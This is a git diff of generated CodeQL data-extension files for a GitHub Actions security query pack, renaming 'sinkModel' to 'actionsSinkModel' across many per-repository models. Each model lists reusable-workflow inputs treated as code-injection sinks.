b/ql/lib/ext/generated/reusable-workflows/manticoresoftware_manticoresearch.model.yml index 800c95ac1bfb..a6b947dfbce7 100644 --- a/ql/lib/ext/generated/reusable-workflows/manticoresoftware_manticoresearch.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/manticoresoftware_manticoresearch.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["manticoresoftware/manticoresearch/.github/workflows/win_test_template.yml", "*", "input.CTEST_END", "code-injection", "generated"] - ["manticoresoftware/manticoresearch/.github/workflows/win_test_template.yml", "*", "input.CTEST_START", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/marcelotduarte_cx_freeze.model.yml b/ql/lib/ext/generated/reusable-workflows/marcelotduarte_cx_freeze.model.yml index 7a73bee6e57a..9359ea482c03 100644 --- a/ql/lib/ext/generated/reusable-workflows/marcelotduarte_cx_freeze.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/marcelotduarte_cx_freeze.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["marcelotduarte/cx_freeze/.github/workflows/build-wheel.yml", "*", "input.branch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/materialdesigninxaml_materialdesigninxamltoolkit.model.yml b/ql/lib/ext/generated/reusable-workflows/materialdesigninxaml_materialdesigninxamltoolkit.model.yml index 08d64944bd9a..023666e67ffb 100644 --- a/ql/lib/ext/generated/reusable-workflows/materialdesigninxaml_materialdesigninxamltoolkit.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/materialdesigninxaml_materialdesigninxamltoolkit.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["materialdesigninxaml/materialdesigninxamltoolkit/.github/workflows/build_artifacts.yml", "*", "input.mdix-mahapps-version", "code-injection", "generated"] - ["materialdesigninxaml/materialdesigninxamltoolkit/.github/workflows/build_artifacts.yml", "*", "input.mdix-colors-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/matter-labs_zksync-era.model.yml b/ql/lib/ext/generated/reusable-workflows/matter-labs_zksync-era.model.yml index d1097c47aeb0..7005b7dd7c91 100644 --- a/ql/lib/ext/generated/reusable-workflows/matter-labs_zksync-era.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/matter-labs_zksync-era.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["matter-labs/zksync-era/.github/workflows/ci-core-reusable.yml", "*", "input.compilers", "code-injection", "generated"] - ["matter-labs/zksync-era/.github/workflows/build-prover-template.yml", "*", "input.image_tag_suffix", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/mattermost_desktop.model.yml b/ql/lib/ext/generated/reusable-workflows/mattermost_desktop.model.yml index 8d7fb64ad3ac..8b73f89401a7 100644 --- a/ql/lib/ext/generated/reusable-workflows/mattermost_desktop.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/mattermost_desktop.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["mattermost/desktop/.github/workflows/e2e-functional-template.yml", "*", "input.nightly", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/mattermost_mattermost.model.yml b/ql/lib/ext/generated/reusable-workflows/mattermost_mattermost.model.yml index d7790e533c94..3cf43b814db7 100644 --- a/ql/lib/ext/generated/reusable-workflows/mattermost_mattermost.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/mattermost_mattermost.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["mattermost/mattermost/.github/workflows/server-test-template.yml", "*", "input.name", "code-injection", "generated"] - ["mattermost/mattermost/.github/workflows/server-test-template.yml", "*", "input.drivername", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/mealie-recipes_mealie.model.yml b/ql/lib/ext/generated/reusable-workflows/mealie-recipes_mealie.model.yml index 093ed8bcfd16..d33e308c7ebb 100644 --- a/ql/lib/ext/generated/reusable-workflows/mealie-recipes_mealie.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/mealie-recipes_mealie.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["mealie-recipes/mealie/.github/workflows/partial-builder.yml", "*", "input.tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/meshery_meshery.model.yml b/ql/lib/ext/generated/reusable-workflows/meshery_meshery.model.yml index 0ce99bc5fa9e..5c1de93f08af 100644 --- a/ql/lib/ext/generated/reusable-workflows/meshery_meshery.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/meshery_meshery.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["meshery/meshery/.github/workflows/test_adaptersv2.yaml", "*", "input.adapter_version", "code-injection", "generated"] - ["meshery/meshery/.github/workflows/test_adaptersv2.yaml", "*", "input.sm_version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/meshtastic_firmware.model.yml b/ql/lib/ext/generated/reusable-workflows/meshtastic_firmware.model.yml index 2767dfbec767..aab9fa502cb7 100644 --- a/ql/lib/ext/generated/reusable-workflows/meshtastic_firmware.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/meshtastic_firmware.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["meshtastic/firmware/.github/workflows/build_rpi2040.yml", "*", "input.board", "code-injection", "generated"] - ["meshtastic/firmware/.github/workflows/build_nrf52.yml", "*", "input.board", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/microcks_microcks.model.yml b/ql/lib/ext/generated/reusable-workflows/microcks_microcks.model.yml index 2c5679329c13..b58fff831e11 100644 --- a/ql/lib/ext/generated/reusable-workflows/microcks_microcks.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/microcks_microcks.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["microcks/microcks/.github/workflows/package-native.yml", "*", "input.image-tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/microsoft_applicationinsights-java.model.yml b/ql/lib/ext/generated/reusable-workflows/microsoft_applicationinsights-java.model.yml index b3e26a1cf137..f96264fbf423 100644 --- a/ql/lib/ext/generated/reusable-workflows/microsoft_applicationinsights-java.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/microsoft_applicationinsights-java.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["microsoft/applicationinsights-java/.github/workflows/reusable-scheduled-job-notification.yml", "*", "input.success", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/microsoft_chat-copilot.model.yml b/ql/lib/ext/generated/reusable-workflows/microsoft_chat-copilot.model.yml index 963b64673a96..6aaf6aa27834 100644 --- a/ql/lib/ext/generated/reusable-workflows/microsoft_chat-copilot.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/microsoft_chat-copilot.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["microsoft/chat-copilot/.github/workflows/copilot-run-integration-tests.yml", "*", "input.BACKEND_HOST", "code-injection", "generated"] - ["microsoft/chat-copilot/.github/workflows/copilot-deploy-plugins.yml", "*", "input.DEPLOYMENT_NAME", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/microsoft_msquic.model.yml b/ql/lib/ext/generated/reusable-workflows/microsoft_msquic.model.yml index fcf55466a9e1..d246f4ce6444 100644 --- a/ql/lib/ext/generated/reusable-workflows/microsoft_msquic.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/microsoft_msquic.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["microsoft/msquic/.github/workflows/build-reuse-winkernel.yml", "*", "input.arch", "code-injection", "generated"] - ["microsoft/msquic/.github/workflows/build-reuse-winkernel.yml", "*", "input.tls", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/microsoft_oryx.model.yml b/ql/lib/ext/generated/reusable-workflows/microsoft_oryx.model.yml index 979bd414141d..a35a1a628e6b 100644 --- a/ql/lib/ext/generated/reusable-workflows/microsoft_oryx.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/microsoft_oryx.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["microsoft/oryx/.github/workflows/automationTemplate.yaml", "*", "input.platformName", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/microsoft_pr-metrics.model.yml b/ql/lib/ext/generated/reusable-workflows/microsoft_pr-metrics.model.yml index 55d810d29b53..ec22645570f7 100644 --- a/ql/lib/ext/generated/reusable-workflows/microsoft_pr-metrics.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/microsoft_pr-metrics.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["microsoft/pr-metrics/.github/workflows/release-phase-1-internal.yml", "*", "input.patch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/microsoft_react-native-windows-samples.model.yml b/ql/lib/ext/generated/reusable-workflows/microsoft_react-native-windows-samples.model.yml index 19350db868c1..e0eccb26a54b 100644 --- a/ql/lib/ext/generated/reusable-workflows/microsoft_react-native-windows-samples.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/microsoft_react-native-windows-samples.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["microsoft/react-native-windows-samples/.github/workflows/template-upgradesample.yml", "*", "input.extraRunWindowsArgs", "code-injection", "generated"] - ["microsoft/react-native-windows-samples/.github/workflows/template-upgradesample.yml", "*", "input.platform", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/microsoft_vscode-cpptools.model.yml b/ql/lib/ext/generated/reusable-workflows/microsoft_vscode-cpptools.model.yml index 8d9af1a4e152..5f85bb1a91ab 100644 --- a/ql/lib/ext/generated/reusable-workflows/microsoft_vscode-cpptools.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/microsoft_vscode-cpptools.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["microsoft/vscode-cpptools/.github/workflows/job-compile-and-test.yml", "*", "input.yarn-args", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/moby_buildkit.model.yml b/ql/lib/ext/generated/reusable-workflows/moby_buildkit.model.yml index 47c09bf4f638..7f1af3242605 100644 --- a/ql/lib/ext/generated/reusable-workflows/moby_buildkit.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/moby_buildkit.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["moby/buildkit/.github/workflows/.test.yml", "*", "input.env", "code-injection", "generated"] - ["moby/buildkit/.github/workflows/.test.yml", "*", "input.includes", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/moby_moby.model.yml b/ql/lib/ext/generated/reusable-workflows/moby_moby.model.yml index 4ff0273b47a6..b06b390e718f 100644 --- a/ql/lib/ext/generated/reusable-workflows/moby_moby.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/moby_moby.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["moby/moby/.github/workflows/.windows.yml", "*", "input.storage", "code-injection", "generated"] - ["moby/moby/.github/workflows/.windows.yml", "*", "input.os", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/mosaicml_composer.model.yml b/ql/lib/ext/generated/reusable-workflows/mosaicml_composer.model.yml index ba53c900ce87..d5746b566cc6 100644 --- a/ql/lib/ext/generated/reusable-workflows/mosaicml_composer.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/mosaicml_composer.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["mosaicml/composer/.github/workflows/docker-configure-build-push.yaml", "*", "input.context", "code-injection", "generated"] - ["mosaicml/composer/.github/workflows/docker-configure-build-push.yaml", "*", "input.tags", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/msys2_setup-msys2.model.yml b/ql/lib/ext/generated/reusable-workflows/msys2_setup-msys2.model.yml index e43a220a2780..fbe9e286d2b4 100644 --- a/ql/lib/ext/generated/reusable-workflows/msys2_setup-msys2.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/msys2_setup-msys2.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["msys2/setup-msys2/.github/workflows/PKGBUILD.yml", "*", "input.test", "code-injection", "generated"] - ["msys2/setup-msys2/.github/workflows/PKGBUILD.yml", "*", "input.path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/mudler_localai.model.yml b/ql/lib/ext/generated/reusable-workflows/mudler_localai.model.yml index dd20d3100794..6ba2fc75375d 100644 --- a/ql/lib/ext/generated/reusable-workflows/mudler_localai.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/mudler_localai.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["mudler/localai/.github/workflows/image_build.yml", "*", "input.latest-image-aio", "code-injection", "generated"] - ["mudler/localai/.github/workflows/image_build.yml", "*", "input.latest-image", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/mustardchef_wsabuilds.model.yml b/ql/lib/ext/generated/reusable-workflows/mustardchef_wsabuilds.model.yml index 3b9777b3f3a5..6d522b776dcd 100644 --- a/ql/lib/ext/generated/reusable-workflows/mustardchef_wsabuilds.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/mustardchef_wsabuilds.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["mustardchef/wsabuilds/.github/workflows/buildarm64.yml", "*", "input.amazonflag", "code-injection", "generated"] - ["mustardchef/wsabuilds/.github/workflows/buildarm64.yml", "*", "input.magiskver", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/n8n-io_n8n.model.yml b/ql/lib/ext/generated/reusable-workflows/n8n-io_n8n.model.yml index 3561bd15c366..c210f350439a 100644 --- a/ql/lib/ext/generated/reusable-workflows/n8n-io_n8n.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/n8n-io_n8n.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["n8n-io/n8n/.github/workflows/e2e-reusable.yml", "*", "input.pr_number", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/napari_napari.model.yml b/ql/lib/ext/generated/reusable-workflows/napari_napari.model.yml index 29da5a83b629..81eeb82033cf 100644 --- a/ql/lib/ext/generated/reusable-workflows/napari_napari.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/napari_napari.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["napari/napari/.github/workflows/reusable_run_tox_test.yml", "*", "input.qt_backend", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/nasa_fprime.model.yml b/ql/lib/ext/generated/reusable-workflows/nasa_fprime.model.yml index 9b92197cf5d9..6d81f2ff242a 100644 --- a/ql/lib/ext/generated/reusable-workflows/nasa_fprime.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/nasa_fprime.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["nasa/fprime/.github/workflows/reusable-project-builder.yml", "*", "input.target_platform", "code-injection", "generated"] - ["nasa/fprime/.github/workflows/reusable-project-builder.yml", "*", "input.fprime_location", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/nautobot_nautobot.model.yml b/ql/lib/ext/generated/reusable-workflows/nautobot_nautobot.model.yml index cbed3964cffd..b7ea7250825c 100644 --- a/ql/lib/ext/generated/reusable-workflows/nautobot_nautobot.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/nautobot_nautobot.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["nautobot/nautobot/.github/workflows/plugin_upstream_testing_base.yml", "*", "input.invoke_context_name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/nektos_act.model.yml b/ql/lib/ext/generated/reusable-workflows/nektos_act.model.yml index 29b47c043360..972b6f15baa4 100644 --- a/ql/lib/ext/generated/reusable-workflows/nektos_act.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/nektos_act.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["nektos/act/pkg/runner/testdata/workflow_call_inputs/workflow_call_inputs.yml", "*", "input.with_default", "code-injection", "generated"] - ["nektos/act/pkg/runner/testdata/workflow_call_inputs/workflow_call_inputs.yml", "*", "input.required", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/neondatabase_neon.model.yml b/ql/lib/ext/generated/reusable-workflows/neondatabase_neon.model.yml index 3b8a83bc8c64..07f0c5c0f691 100644 --- a/ql/lib/ext/generated/reusable-workflows/neondatabase_neon.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/neondatabase_neon.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["neondatabase/neon/.github/workflows/build-build-tools-image.yml", "*", "input.image-tag", "output.image-tag", "taint", "manual"] - ["neondatabase/neon/.github/workflows/build-build-tools-image.yml", "*", "input.image-tag", "output.image", "taint", "manual"] diff --git a/ql/lib/ext/generated/reusable-workflows/neovim_neovim.model.yml b/ql/lib/ext/generated/reusable-workflows/neovim_neovim.model.yml index 3c406b3bc0e6..6bbf33e7f89a 100644 --- a/ql/lib/ext/generated/reusable-workflows/neovim_neovim.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/neovim_neovim.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["neovim/neovim/.github/workflows/test_windows.yml", "*", "input.build_flags", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/nethermindeth_nethermind.model.yml b/ql/lib/ext/generated/reusable-workflows/nethermindeth_nethermind.model.yml index 3a94887f8ffb..165965dd568a 100644 --- a/ql/lib/ext/generated/reusable-workflows/nethermindeth_nethermind.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/nethermindeth_nethermind.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["nethermindeth/nethermind/.github/workflows/run-a-single-node-from-branch.yml", "*", "input.custom_run_id", "code-injection", "generated"] - ["nethermindeth/nethermind/.github/workflows/run-a-single-node-from-branch.yml", "*", "input.non_validator_mode", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-dotnet-agent.model.yml b/ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-dotnet-agent.model.yml index 5198d5f418a5..3d1e182458e1 100644 --- a/ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-dotnet-agent.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-dotnet-agent.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["newrelic/newrelic-dotnet-agent/.github/workflows/publish_release_notes.yml", "*", "input.agent_version", "code-injection", "generated"] - ["newrelic/newrelic-dotnet-agent/.github/workflows/post_deploy_agent.yml", "*", "input.test_mode", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-java-agent.model.yml b/ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-java-agent.model.yml index e3694a389735..689cc91871ab 100644 --- a/ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-java-agent.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-java-agent.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["newrelic/newrelic-java-agent/.github/workflows/X-Reusable-VerifyInstrumentation.yml", "*", "input.page", "code-injection", "generated"] - ["newrelic/newrelic-java-agent/.github/workflows/GHA-Unit-Tests.yaml", "*", "input.agent-ref", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/newrelic_node-newrelic.model.yml b/ql/lib/ext/generated/reusable-workflows/newrelic_node-newrelic.model.yml index f6f33154581e..0481c04cb671 100644 --- a/ql/lib/ext/generated/reusable-workflows/newrelic_node-newrelic.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/newrelic_node-newrelic.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["newrelic/node-newrelic/.github/workflows/release-creation.yml", "*", "input.changelog_file", "code-injection", "generated"] - ["newrelic/node-newrelic/.github/workflows/release-creation.yml", "*", "input.workflows", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/nexus-mods_nexusmods.app.model.yml b/ql/lib/ext/generated/reusable-workflows/nexus-mods_nexusmods.app.model.yml index 34efc8414d89..8c0c944a3937 100644 --- a/ql/lib/ext/generated/reusable-workflows/nexus-mods_nexusmods.app.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/nexus-mods_nexusmods.app.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["nexus-mods/nexusmods.app/.github/workflows/build-windows-pupnet.yaml", "*", "input.AppVersion", "code-injection", "generated"] - ["nexus-mods/nexusmods.app/.github/workflows/build-windows-pupnet.yaml", "*", "input.PupNetVersion", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/nginxinc_kubernetes-ingress.model.yml b/ql/lib/ext/generated/reusable-workflows/nginxinc_kubernetes-ingress.model.yml index 71866026ef91..8f4c44324088 100644 --- a/ql/lib/ext/generated/reusable-workflows/nginxinc_kubernetes-ingress.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/nginxinc_kubernetes-ingress.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["nginxinc/kubernetes-ingress/.github/workflows/retag-images.yml", "*", "input.target_tag", "code-injection", "generated"] - ["nginxinc/kubernetes-ingress/.github/workflows/retag-images.yml", "*", "input.source_tag", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/nocodb_nocodb.model.yml b/ql/lib/ext/generated/reusable-workflows/nocodb_nocodb.model.yml index 83d241d21c0c..9406f7d299cf 100644 --- a/ql/lib/ext/generated/reusable-workflows/nocodb_nocodb.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/nocodb_nocodb.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["nocodb/nocodb/.github/workflows/playwright-test-workflow.yml", "*", "input.shard", "code-injection", "generated"] - ["nocodb/nocodb/.github/workflows/playwright-test-workflow.yml", "*", "input.db", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/novuhq_novu.model.yml b/ql/lib/ext/generated/reusable-workflows/novuhq_novu.model.yml index 3021de125684..36838ef4ddb1 100644 --- a/ql/lib/ext/generated/reusable-workflows/novuhq_novu.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/novuhq_novu.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["novuhq/novu/.github/workflows/reusable-workers-service-deploy.yml", "*", "input.docker_image", "code-injection", "generated"] - ["novuhq/novu/.github/workflows/reusable-workers-service-deploy.yml", "*", "input.terraform_workspace", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/npm_abbrev-js.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_abbrev-js.model.yml index d2cb1da1e9fd..8b16601e6c22 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_abbrev-js.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_abbrev-js.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["npm/abbrev-js/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_cli.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_cli.model.yml index c551a135a142..e8db2ff568de 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_cli.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_cli.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["npm/cli/.github/workflows/node-integration.yml", "*", "input.npmVersion", "code-injection", "generated"] - ["npm/cli/.github/workflows/node-integration.yml", "*", "input.nodeVersion", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_fs-minipass.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_fs-minipass.model.yml index f469f5de268d..208e444adebc 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_fs-minipass.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_fs-minipass.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["npm/fs-minipass/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_hosted-git-info.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_hosted-git-info.model.yml index 7ec8dac3f7bb..41edf0b03737 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_hosted-git-info.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_hosted-git-info.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["npm/hosted-git-info/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_ini.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_ini.model.yml index 4ce9252ce76c..faca7973f1f1 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_ini.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_ini.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["npm/ini/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_json-parse-even-better-errors.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_json-parse-even-better-errors.model.yml index abb5b43c3276..76db6821c5e6 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_json-parse-even-better-errors.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_json-parse-even-better-errors.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["npm/json-parse-even-better-errors/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_minify-registry-metadata.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_minify-registry-metadata.model.yml index 